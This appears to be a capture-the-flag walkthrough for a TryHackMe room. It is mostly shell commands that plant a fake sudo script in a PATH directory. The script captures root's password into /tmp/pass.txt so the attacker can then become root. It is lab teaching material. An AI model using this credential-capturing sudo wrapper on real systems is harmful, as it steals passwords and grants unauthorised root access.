THM “Eavesdropper” Room — Complete Walkthrough

Step 1: SSH Access

bash

# Save provided private key
echo '-----BEGIN OPENSSH PRIVATE KEY-----...' > frank_key
chmod 600 frank_key

# Connect to target
ssh -i frank_key frank@<TARGET_IP>

Step 2: Initial Check

bash

# Check sudo privileges
sudo -l
# Shows no sudo access for frank

Step 3: Find Attack Vector

The room hints at “listening closely” — use process monitoring:

bash

# Get pspy64 (in AttackBox it's already in /opt)
cd /tmp
# Or download: wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

# Monitor processes
./pspy64

Observation: Root periodically runs sudo cat /etc/shadow

Step 4: PATH Hijacking Setup

bash

# Create malicious directory
mkdir /tmp/hack

# Add to PATH (first position)
export PATH="/tmp/hack:$PATH"# Create fake sudo script
cat > /tmp/hack/sudo << 'EOF'
#!/bin/bash
read -s password
echo $password > /tmp/pass.txt
echo "$password" | /usr/bin/sudo -S "$@"
EOFchmod +x /tmp/hack/sudo

Step 5: Wait for Capture

bash

# Wait 3-5 minutes for cron job
sleep 300

# Check for captured password
cat /tmp/pass.txt

Step 6: Privilege Escalation

bash

# Use captured password
su root
# Enter password from pass.txt

# Or
echo "$(cat /tmp/pass.txt)" | sudo -S bash

Step 7: Get Flag

bash

cat /root/flag.txt
# Flag: THM{...}

Why This Works:

1. Root’s cron runs sudo cat /etc/shadow
2. System finds our fake /tmp/hack/sudo first in PATH
3. Fake sudo captures password, saves it, passes to real sudo
4. We use captured password to become root

Time to complete: ~10 minutes
Difficulty: Medium
Key lesson: PATH variable manipulation can lead to credential theft